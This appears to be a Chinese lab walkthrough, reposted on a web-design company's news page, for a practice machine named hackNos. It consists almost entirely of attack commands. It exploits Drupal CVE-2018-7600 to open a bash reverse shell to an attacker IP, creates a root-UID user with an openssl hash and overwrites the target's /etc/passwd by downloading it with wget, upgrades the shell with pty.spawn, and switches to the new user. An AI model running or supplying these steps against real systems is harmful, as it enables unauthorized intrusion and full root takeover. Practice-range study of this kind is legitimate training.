尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

靶场1

靶场1
📅 发布时间:2026/6/19 22:11:08

进入kali root权限

  • 反弹一个shell
    攻击机监听:
    nc -lvnp 10000
    目的主机:
    python3 drupa7-CVE-2018-7600.py http://210.26.72.210/drupal/ -c "bash -c 'bash -i >& /dev/tcp/210.26.72.230/10000 0>&1'"

  • 进入目标主机的命令行界面(Shell 环境)
    www-data@hackNos:/var/www/html/drupal$

  • 目标主机的命令行界面:
    cat passwd
    cat /etc/passwd
    攻击机:
    openssl passwd -1 -salt wyr 密码 生成密文
    cd /home
    mkdir wyr
    cd wyr
    touch passwd
    vim passwd(copy 目标主机文件/etc/passwd 最后一行加上wyr:$1$wyr$A20hHuKW8gs4c6LVmb270/:0:0:root:/root:/bin/bash)
    python3 -m http.server 9001

  • 目标主机的命令行界面:
    cd /etc
    wget http://210.26.72.230:9001/passwd -O /etc/passwd
    wget http://210.26.72.230:9001/passwd -O /var/www/html/drupal
    渗透测试中获取基础反向 shell 后(如通过 nc、bash 等方式),通常会立即执行这条命令,将 shell 升级为全交互模式:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  • su wyr

相关新闻

  • 贝叶斯定理简单解释
  • 【CV】GAN代码解析:base_model.py
  • 学校站群框架如何开发插件实现Word图片的批量上传与编辑?

最新新闻

  • C# .NET 构建高性能WebSocket服务端:从Fleck入门到实战优化
  • FanControl V270深度解析:Windows风扇控制的5个专业技巧与完整架构指南
  • 如何用ExplorerPatcher重塑Windows 11操作习惯:新手也能掌握的完整改造指南
  • 电瓶车省内托运哪个平台划算?同城寄运避坑指南 - 快递物流资讯
  • 上海配眼镜价格真相,同一副镜片在不同渠道的成本拆到最底层 - 配眼镜新资讯
  • Mask R-CNN重叠目标检测失效原因与四类工程化解决方案

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号